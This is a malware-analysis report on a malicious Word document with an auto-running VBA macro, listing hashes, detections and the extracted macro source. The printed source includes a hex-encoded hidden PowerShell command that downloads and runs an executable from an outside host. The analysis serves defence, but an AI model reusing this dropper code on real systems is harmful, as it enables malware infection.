Office (OOXML) malware analysis — malicious · 1ceac5c674bbe04a

MALICIOUS

Office (OOXML)

57.2 KB Created: 2021-01-31 23:09:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2021-04-10

MD5: 2445e495a59510534c007f269dc768b7 SHA-1: 630cdbd4ebddbb6e07c71e4abba11054cfe7ba08 SHA-256: 1ceac5c674bbe04a826a0656e45dd1c064794e1bd12d5d16eeac2a65f9d8064b

192 Risk Score

Heuristics 7

ClamAV: Doc.Dropper.Generic-9823774-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Generic-9823774-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

Call Shell(ChrEncode("706F7765727368656C6C2E657865202D657865637574696F6E706F6C69637920627970617373202D572048696464656E202D636F6D6D616E6420286E65772D6F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F7365762E6D696C656E62617A696E736B692E6D653A323039352F61622F6164312E657865272C24656E763A54656D702B275C6C666B2E65786527293B284E65772D4F626A656374202D636F6D205368656C6C2E4170706C69636174696F6E292E5368656C6C457865637574652824656E763A54656D702B275C6C666B2E65 …

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	3192 bytes
SHA-256: `5d395f693cac860ed490a07cedae57e457f3edecb1ad81cf819a7e325d725001`
Detection ClamAV: No threats found Obfuscation or payload: likely 33 of 56 identifiers look randomly generated (e.g. 'hcxipizmwwzlhcfclfyiqxtzp') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub rau() Local $x = ["spgodqhyljabvqiqfpvwrrmwr" ,BitXOR(BitRotate(56550),7526) ,"ctpqrlzcfndbqlckkhgjbbomx" ,"blmjkkkgcxyxysdxxqofpmahh" ,"jopjrhgfzjzfzvlflqwncfila" ,BitRotate(BitNot(30936)) ,"vmtcaljorckgwgdopzplrspjq" ,BitXOR(BitNot(BitOr(4479,8508)),3388) ,"hcxipizmwwzlhcfclfyiqxtzp" ,Sqrt(BitAnd(Int(97665),6571)) ,BitXOR(BitRotate(Sqrt(27423)),8434) ,"cdtssdhkguzktfnvbfykjoknr" ,BitXOR(Sqrt(96943),6415) ,"kdxuwqbgbetfhonszlhovsjqg" ,"ufvpyystmwiamyedtbuaaumua" ,"xpxgvnbtupubaipbxooiclvyi" ,"cxtyereyjkfacarovnukgzlbm" ,BitOr(BitNot(74858),9401) ,"fivljaumvojvbtrgsxwcrbpqp" ,Sqrt(BitOr(BitAnd(37052,5640),9074)) ,"jryrpjewyfmcvwlwzafuzmhsj" ,BitNot(BitAnd(BitAnd(85247,1615),2419)) ,BitRotate(Int(25889)) ,"jwmhipsietwneipzvfitadtkn" ,"qonlixnwpjaxcuqspqcihjtut" ] Local $chbhh = ["uthvbllbugnfmtuujsamxwver" ,"kphjdewgdphwhulqfzfdedxst" ,"grdhiqfwcjqjyjbzyripwrbgm" ,Int(Int(Int(81094))) ,Int(BitOr(94945,4088)) ,BitNot(BitRotate(57815)) ,"rdwjiqxdnabggwalxvnllkbhh" ,"cyvzhsrcpfsyecptruoiiuntp" ,BitOr(BitXOR(89432,6654),174) ,"vxzwgfidxbqvuzwuloaqugxrf" ,BitNot(BitRotate(Int(94425))) ,"fhcympkotdjekyiwdnnlzhnpf" ,BitOr(Int(BitOr(74465,1249)),5478) ,BitXOR(BitRotate(BitOr(12965,4566)),6147) ,"puhycfolkzfsizjuhkqnkvcyd" ,BitOr(BitXOR(25745,1765),5886) ,BitRotate(Int(BitNot(83051))) ,Sqrt(Int(Int(26937))) ,BitXOR(BitOr(89299,9237),4324) ,Int(Sqrt(69712)) ] Local $fewgmwksaf = [BitRotate(BitOr(53911,2920)) ,"lqwhliuqjkjgcjvwbvlyrmbkp" ,BitOr(BitNot(Int(20761)),8279) ,Int(BitAnd(69625,5911)) ,Int(BitOr(63048,7848)) ,BitAnd(Sqrt(39481),3486) ,BitXOR(BitOr(41826,9441),6053) ,Int(Sqrt(77639)) ,BitOr(BitRotate(417),9793) ,"uwsmjyzcpvmcdcrsqwfjthdzb" ,"shnzcgynivfztvuoapwqtsnlh" ,"nafcepvkqnoqmyqxujgmnfkjn" ,BitNot(Sqrt(16272)) ,"lrnbsbcydvpkoqnqzmoarbbyr" ,Int(Int(BitOr(32568,8063))) ,BitNot(Int(BitXOR(35718,942))) ,"qavylspvnzpptxikwhkkcznst" ,BitAnd(BitNot(Sqrt(99403)),2148) ,BitNot(BitOr(BitOr(75740,6999),6946)) ,"gthqpbxcgjoqrilxgcdwzbcfe" ,"fhfeqwvldbscyjwcunzypyufo" ,"ruibxxkpalxtjhwsfpjkjldxl" ,"npbuyyjfvkofuggxqjkicdlyk" ,"yxzxzfsogtsspelcppwrqlgmp" ,"ncyyuogzazfbkapbxcfddxzza" ] End Sub Sub bap() Call Shell(ChrEncode("706F7765727368656C6C2E657865202D657865637574696F6E706F6C69637920627970617373202D572048696464656E202D636F6D6D616E6420286E65772D6F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F7365762E6D696C656E62617A696E736B692E6D653A323039352F61622F6164312E657865272C24656E763A54656D702B275C6C666B2E65786527293B284E65772D4F626A656374202D636F6D205368656C6C2E4170706C69636174696F6E292E5368656C6C457865637574652824656E763A54656D702B275C6C666B2E6578652729")) End Sub Function ChrEncode(str) Dim i Dim sStr sStr = "" For i = 1 To Len(str) Step 2 sStr = sStr + Chr(CLng("&H" & Mid(str, i, 2))) Next ChrEncode = sStr End Function Sub autoopen() bap End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	14848 bytes
SHA-256: `ad269aa2b1f5d83d6f9373f228a13036f241ddb91b0f0bbf964bab4a9ac259ba`
Detection ClamAV: No threats found Obfuscation or payload: likely 99 of 182 identifiers look randomly generated (e.g. 'vxzwgfidxbqvuzwuloaqugxrf') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.